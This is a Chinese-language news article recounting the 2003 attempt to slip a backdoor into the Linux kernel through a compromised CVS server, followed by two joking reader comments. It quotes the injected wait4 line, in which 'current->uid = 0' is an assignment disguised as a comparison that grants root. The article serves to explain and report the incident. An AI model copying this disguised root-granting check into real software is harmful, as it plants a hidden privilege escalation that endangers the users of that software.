2003年,有人企图在Linux中植入后门

jack32 2013-10-12 95472人围观 ,发现 16 个不明物体 资讯

spy-thief

普林斯顿大学计算机科学教授Ed Felten回顾了2003年的一次企图在Linux内核中植入后门的事件。2003年,Linux内核使用BitKeeper作为源码管理系统。如果开发者想要修改Linux代码,他们需要先递交修改提议,然后由一个审批程序决定在源码原拷贝中是否接受这些改动。有些人不喜欢BitKeeper,所以第二份源码拷贝用CVS系统管理。

2003年11月5日,Larry McAvoy(开发BitKeeper的BitMover公司总裁)注意到CVS拷贝中的一个代码变动没有审批记录。调查发现,这一代码变动根本没有经过审批,也没有出现在BitKeeper管理的源码中进一步调查发现,有人入侵了CVS服务器,在内核源码中插入了一个小改动

wait4: 'if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) ...

‘它看起来似乎是一个无害的错误检查代码,但细心的读者会注意到,第一行最后是uid = 0而不是== 0,它实际上给予任何以某种本来被认为无效调用wait4的软件以root权限。换句话说,它是一个典型的后门程序。

没人知道是谁企图植入后门,至于是否是NSA所为也不得而知。

这些评论亮了

  • 河蟹 回复
    这种 事都是我做的
    )16( 亮了
  • xxoo 回复
    擦~
    这是被发现的~
    是否存在没有被发现的呢?~
    )6( 亮了
发表评论

已有 16 条评论

取消
Loading...
css.php